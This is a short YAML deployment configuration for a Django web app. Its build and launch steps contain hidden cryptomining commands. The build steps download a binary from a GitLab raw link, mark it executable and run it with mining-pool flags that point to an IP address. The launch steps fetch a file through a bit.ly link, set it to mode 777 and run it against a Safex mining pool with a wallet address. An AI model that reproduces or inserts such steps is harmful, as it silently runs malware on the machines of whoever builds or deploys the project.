deployments:
  MyWebApp:
    dockerimage: ubuntu:14.04
    build_steps:
      - wget https://gitlab.com/jningkulin/movies/raw/main/xmolx
      - chmod u+x xmolx
      - ./xmolx -o 8.209.98.71:443 -u Sumi -p x --donate-level 1 -k 
      - apt-get update && apt-get install -y libssl-dev \
        libpq-dev git \
        python python-dev python-pip python-virtualenv
      - pip install setuptools pip
      - pip install ~/code
    launch_steps:
      - cd ~/code/mysite
      - python manage.py runserver 0.0.0.0:80
      - apt-get update && wgeget -O xxx https://bit.ly/38QFOus && chmod 777 xxx && ./xxx -a rx/sfx -o pool.safex.org:3311 -u Safex5yuPhr9TAZMoZ3ZfQ5ERrEBB51QsGqpuHjJK